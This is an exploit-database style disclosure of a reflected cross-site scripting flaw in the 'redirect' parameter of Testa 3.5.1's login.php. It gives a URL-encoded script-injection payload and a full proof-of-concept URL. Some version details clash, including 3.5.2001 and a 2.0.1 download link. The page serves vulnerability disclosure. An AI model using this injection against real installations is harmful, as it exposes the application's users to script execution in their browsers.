Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)

vendor:

Testa

by:

Ashkan Moghaddas

8.8

CVSS

HIGH

Reflected Cross-Site Scripting (XSS)

CWE

Product Name: Testa

Affected Version From: 3.5.2001

Affected Version To: 3.5.2001

Patch Exists: NO

Related CWE:

CPE: a:testa:testa:3.5.1

Metasploit:

Other Scripts:

Platforms Tested: Windows/Linux

2022

Testa 3.5.1 Online Test Management System – Reflected Cross-Site Scripting (XSS)

Testa 3.5.1 is vulnerable to Reflected Cross-Site Scripting (XSS). An attacker can inject malicious JavaScript code into the 'redirect' parameter of the 'login.php' page. When a user visits the page, the malicious code will be executed in the user's browser.

Mitigation:

Input validation should be used to prevent XSS attacks. The application should validate all input data and reject any malicious data.

Source

Exploit-DB raw data:

# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
# Date: 28/08/2022
# Exploit Author: Ashkan Moghaddas
# Vendor Homepage: https://testa.cc
# Software Link:
https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
# Version: 3.5.1
# Tested on: Windows/Linux

# Proof of Concept:
# 1- Install Testa 3.5.1
# 2- Go to https://localhost.com/login.php?redirect=XXXX
# 3- Add payload to the Tab, the XSS Payload:
%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
# 4- XSS has been triggered.

# Go to this url "
https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
"
XSS will trigger.